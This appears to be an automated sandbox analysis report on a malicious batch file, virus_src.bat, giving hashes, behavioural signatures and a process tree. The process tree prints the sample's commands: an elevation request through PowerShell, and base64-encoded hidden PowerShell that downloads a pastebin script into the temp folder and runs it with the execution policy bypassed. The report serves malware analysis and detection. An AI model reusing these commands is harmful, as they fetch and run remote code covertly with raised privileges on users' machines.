Analysis
-
max time kernel
16s -
max time network
18s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
07-12-2024 20:57
Static task
static1
Behavioral task
behavioral1
Sample
virus_src.bat
Resource
win7-20240903-en
General
-
Target
virus_src.bat
-
Size
652B
-
MD5
3d20c8ba40ea3e85334342e7c01018bd
-
SHA1
b678d69ec173ca2e385ba8a8bda18be618f5af2c
-
SHA256
4a4f56be826841723b685fe98aedfb81eb3c11dfac2f4a466f4c78eef2c5bb71
-
SHA512
0fdeac77b6c4f3ba7ee53c33785c6c576873a7798d8921721d21498910316893b8ebb0e499759bd1d62239506499ce4bf9f222a2019c4a882ffd1a2ce86a6776
Malware Config
Signatures
-
pid Process 2688 powershell.exe 2544 powershell.exe 2760 powershell.exe 2224 powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2688 powershell.exe 2688 powershell.exe 2688 powershell.exe 2760 powershell.exe 2544 powershell.exe 2224 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2688 powershell.exe Token: SeDebugPrivilege 2760 powershell.exe Token: SeDebugPrivilege 2544 powershell.exe Token: SeDebugPrivilege 2224 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2180 wrote to memory of 2688 2180 cmd.exe 31 PID 2180 wrote to memory of 2688 2180 cmd.exe 31 PID 2180 wrote to memory of 2688 2180 cmd.exe 31 PID 2688 wrote to memory of 320 2688 powershell.exe 32 PID 2688 wrote to memory of 320 2688 powershell.exe 32 PID 2688 wrote to memory of 320 2688 powershell.exe 32 PID 320 wrote to memory of 2760 320 cmd.exe 34 PID 320 wrote to memory of 2760 320 cmd.exe 34 PID 320 wrote to memory of 2760 320 cmd.exe 34 PID 320 wrote to memory of 2544 320 cmd.exe 35 PID 320 wrote to memory of 2544 320 cmd.exe 35 PID 320 wrote to memory of 2544 320 cmd.exe 35 PID 2544 wrote to memory of 2224 2544 powershell.exe 36 PID 2544 wrote to memory of 2224 2544 powershell.exe 36 PID 2544 wrote to memory of 2224 2544 powershell.exe 36
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\virus_src.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\virus_src.bat' -ArgumentList "am_admin"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\virus_src.bat" am_admin3⤵
- Suspicious use of WriteProcessMemory
PID:320 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -NoLogo -enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8AQgBoAFcAdgBTAFAAcQBxACkALgBjAG8AbgB0AGUAbgB0ACAAPgAgACQAZQBuAHYAOgB0AGUAbQBwAFwAUwB5AHMAdABlAG0AUwB0AGEAcgB0AHUAcAAuAHAAcwAxAA==4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -NoLogo -enc cABvAHcAZQByAHMAaABlAGwAbAAgAC0AbgBvAGUAeABpAHQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIAAtAEYAaQBsAGUAIAAkAGUAbgB2ADoAdABlAG0AcABcAFMAeQBzAHQAZQBtAFMAdABhAHIAdAB1AHAALgBwAHMAMQA=4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\SystemStartup.ps15⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2224
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5e8b08e1162f7ca0bf0dc52eee62245a3
SHA1937fba4e9c7690d4abe591ba0f6701f53ac3d87e
SHA256b57b9687b6cc530c7d123acf6ed3e362ef3a8234883710fabd2b9daec27d813d
SHA512167485788f01c69a2fcf3eb3afeb16e0841ef9232417b8a5bb5c09f3058ae55170fd9b5d216ad2fa7a33a995277b35d9ad1ed4851580a9bd3dbd02f44e955089